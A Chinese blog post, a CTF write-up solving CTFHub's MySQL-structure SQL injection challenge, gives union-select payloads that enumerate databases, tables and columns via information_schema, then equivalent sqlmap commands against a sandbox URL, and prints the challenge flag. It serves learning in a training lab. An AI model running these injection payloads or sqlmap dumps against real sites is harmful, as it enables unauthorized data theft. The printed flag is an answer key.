CTFHub技能树之WEB MYSQL结构

于 2022-03-20 21:16:32 发布
阅读量1.5k 收藏 2
点赞数
分类专栏: CTF SQL注入 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_48799157/article/details/123621465
版权

小白一个,如有错误请指正!

解法一:

1.这里还是老方法,输入 1, 2 ,3 ,得知字段有两个

 

 2.爆数据库

select * from news where id=123 union select 1,database()#

3.爆表名

select * from news where id=123 union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'sqli'

 

4.爆字段,爆完得知其实flag是在qakmzmsenl表里

select * from news where id=123 union select 1,group_concat(column_name) from information_schema.columns where table_name = 'qakmzmsenl'

 5.爆flag

select * from news where id=123 union select 1,jcpppvdskp from sqli.qakmzmsenl#

成功拿到flag 

ctfhub{25d00627b6a8008e89d5cf74}

解法二: sqlmap

1.爆数据库

sqlmap -u http://challenge-f172cbc3ba2e04cd.sandbox.ctfhub.com:10800/?id=1 --dbs

2.爆表名

sqlmap -u http://challenge-f172cbc3ba2e04cd.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables 

 3.爆字段

sqlmap -u http://challenge-f172cbc3ba2e04cd.sandbox.ctfhub.com:10800/?id=1 -D sqli -T qakmzmsenl --columns

4.爆flag

sqlmap -u http://challenge-f172cbc3ba2e04cd.sandbox.ctfhub.com:10800/?id=1 -D sqli -T qakmzmsenl -C jcpppvdskp --dump

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值